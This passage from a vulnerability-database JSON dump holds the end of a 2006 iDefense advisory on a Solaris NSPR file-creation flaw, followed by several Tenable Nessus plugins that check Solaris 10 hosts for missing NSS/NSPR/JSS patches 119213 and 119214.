This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n08/31/2006 Initial vendor notification\r\n09/04/2006 Initial vendor response\r\n10/11/2006 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2006 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "SECURITYVULNS:DOC:14651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14651", "title": "[Full-disclosure] iDefense Security Advisory 10.11.06: Sun Microsystems Solaris NSPR Library Arbitrary File Creation Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:49", "description": "NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17\n\nThis plugin has been deprecated and either replaced with individual 119213 patch-revision plugins, or deemed non-security related.", "edition": 9, "published": "2005-10-19T00:00:00", "title": "Solaris 10 (sparc) : 119213-36 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_119213.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20052", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. 
Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20052);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/30 13:40:15\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-36 (deprecated)\");\n script_summary(english:\"Check for patch 119213-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17\n\nThis plugin has been deprecated and either replaced with individual\n119213 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This 
script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 119213 instead.\");\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-04-01T06:23:07", "description": "NSS_NSPR_JSS 3.35_x86: NSPR 4.18 / NSS 3.35 / JSS 4.3.2.\nDate this patch was last updated by Sun : May/16/18", "edition": 25, "published": "2018-05-17T00:00:00", "title": "Solaris 10 (x86) : 119214-38", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-38.NASL", "href": "https://www.tenable.com/plugins/nessus/109884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109884);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-38\");\n script_summary(english:\"Check for patch 119214-38\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119214-38\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.35_x86: NSPR 4.18 / NSS 3.35 / JSS 4.3.2.\nDate this patch was last updated by Sun : May/16/18\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://getupdates.oracle.com/readme/119214-38\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-38 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.17.4: NSPR 4.10.7 / NSS 3.17.4 / JSS 4.3.2.\nDate this patch was last updated by Sun : Dec/24/15", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-32", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-32.NASL", "href": "https://www.tenable.com/plugins/nessus/107311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107311);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-32\");\n script_summary(english:\"Check for patch 119213-32\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing 
Sun Security Patch number 119213-32\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.17.4: NSPR 4.10.7 / NSS 3.17.4 / JSS 4.3.2.\nDate this patch was last updated by Sun : Dec/24/15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-32\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-32 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-02-21T01:08:49", "description": "NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17\n\nThis plugin has been deprecated and either replaced with individual 119214 patch-revision plugins, or deemed non-security related.", "edition": 9, "published": "2005-10-19T00:00:00", "title": "Solaris 10 (x86) : 119214-36 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_119214.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20055", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. 
Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20055);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/30 13:40:15\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-36 (deprecated)\");\n script_summary(english:\"Check for patch 119214-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17\n\nThis plugin has been deprecated and either replaced with individual\n119214 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 119214 instead.\");\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-17T14:00:36", "description": "NSS_NSPR_JSS 3.16_x86: NSPR 4.10.4 / NSS 3.\nDate this patch was last updated by Sun : Nov/15/14", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119214-30", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-30.NASL", "href": "https://www.tenable.com/plugins/nessus/107812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107812);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-30\");\n script_summary(english:\"Check for patch 119214-30\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119214-30\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.16_x86: NSPR 4.10.4 / NSS 3.\nDate this patch was last updated by Sun : 
Nov/15/14\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-30\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-30 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.17.2: NSPR 4.10.7 / NSS 3.1.\nDate this patch was last updated by Sun : Feb/19/15", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-31", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-31.NASL", "href": "https://www.tenable.com/plugins/nessus/107310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107310);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-31\");\n script_summary(english:\"Check for patch 119213-31\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security 
Patch number 119213-31\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.17.2: NSPR 4.10.7 / NSS 3.1.\nDate this patch was last updated by Sun : Feb/19/15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-31 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr 